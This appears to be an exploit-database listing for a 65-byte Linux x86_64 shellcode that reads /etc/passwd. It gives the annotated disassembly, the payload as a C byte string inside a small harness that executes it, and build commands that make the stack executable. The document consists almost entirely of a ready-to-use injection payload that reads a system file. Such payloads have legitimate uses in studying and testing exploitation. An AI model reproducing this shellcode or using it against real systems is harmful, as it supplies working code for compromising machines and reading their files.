Linux/x86_64 - Read /etc/passwd - 65 bytes



EKU-ID: 5498 CVE: OSVDB-ID:
Author: Ajith Kp Published: 2016-04-18 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
---------------------------------------------------------------------------------------------------
 
Linux/x86_64 - Read /etc/passwd - 65 bytes
 
Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
 
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
 
---------------------------------------------------------------------------------------------------
Disassembly of section .text:
 
Disassembly of section .text:
 
0000000000400080 <.text>:
  400080: eb 2f                 jmp    0x4000b1
  400082: 5f                    pop    rdi
  400083: 6a 02                 push   0x2
  400085: 58                    pop    rax
  400086: 48 31 f6              xor    rsi,rsi
  400089: 0f 05                 syscall
  40008b: 66 81 ec ef 0f        sub    sp,0xfef
  400090: 48 8d 34 24           lea    rsi,[rsp]
  400094: 48 97                 xchg   rdi,rax
  400096: 48 31 d2              xor    rdx,rdx
  400099: 66 ba ef 0f           mov    dx,0xfef
  40009d: 48 31 c0              xor    rax,rax
  4000a0: 0f 05                 syscall
  4000a2: 6a 01                 push   0x1
  4000a4: 5f                    pop    rdi
  4000a5: 48 92                 xchg   rdx,rax
  4000a7: 6a 01                 push   0x1
  4000a9: 58                    pop    rax
  4000aa: 0f 05                 syscall
  4000ac: 6a 3c                 push   0x3c
  4000ae: 58                    pop    rax
  4000af: 0f 05                 syscall
  4000b1: e8 cc ff ff ff        call   0x400082
  4000b6: 2f                    (bad) 
  4000b7: 65 74 63              gs je  0x40011d
  4000ba: 2f                    (bad) 
  4000bb: 70 61                 jo     0x40011e
  4000bd: 73 73                 jae    0x400132
  4000bf: 77 64                 ja     0x400125
 
---------------------------------------------------------------------------------------------------
 
How To Run
 
$ gcc -o read_passwd read_passwd.c
$ execstack -s read_passwd
$ ./read_passwd
 
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\xeb\x2f\x5f\x6a\x02\x58\x48\x31\xf6\x0f\x05\x66\x81\xec\xef\x0f\x48\x8d\x34\x24\x48\x97\x48\x31\xd2\x66\xba\xef\x0f\x48\x31\xc0\x0f\x05\x6a\x01\x5f\x48\x92\x6a\x01\x58\x0f\x05\x6a\x3c\x58\x0f\x05\xe8\xcc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
void main(int argc, char **argv)
{
    int (*func)();
    func = (int (*)()) sh;
    (int)(*func)();
}